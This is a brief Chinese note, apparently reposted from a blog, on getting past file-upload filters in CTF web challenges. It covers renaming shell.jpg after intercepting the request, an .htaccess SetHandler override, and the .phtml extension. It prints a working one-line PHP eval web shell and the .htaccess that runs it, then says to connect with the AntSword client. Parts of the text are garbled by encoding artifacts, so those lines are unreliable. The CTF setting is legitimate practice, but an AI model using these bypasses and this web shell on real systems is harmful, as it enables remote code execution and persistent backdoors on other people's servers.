一.上傳shell.jpg(基本沒用）

二.上傳shell.jpg，抓包之后改shell.php(沒有第二次）

三.先上傳.htaccess文件繞過，再上傳shell.jpg

四.剛學(xué)習(xí)了一種繞過方法，就是吧shell.jpg的擴(kuò)展名直接改為.phtml

以上方式成功上傳一句話木馬之后，鏈接蟻劍，查看目錄找flag即可，

還有例外的上傳文件題，flag在配置文件中，需在配置文件中找flag。

附：

.htaccess文件：

<FilesMatch "shell.jpg">

SetHandler application/x-httpd-php

</FilesMatch>

(shell.jpg是一句話木馬文件)

一句話木馬文件shell.php:

<?php @eval($_POST['pass']);?>

(在用yijian鏈接時密碼就是post括號引號里的）

總結(jié)

以上是生活随笔為你收集整理的web文件上传思路(一句话muma）的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。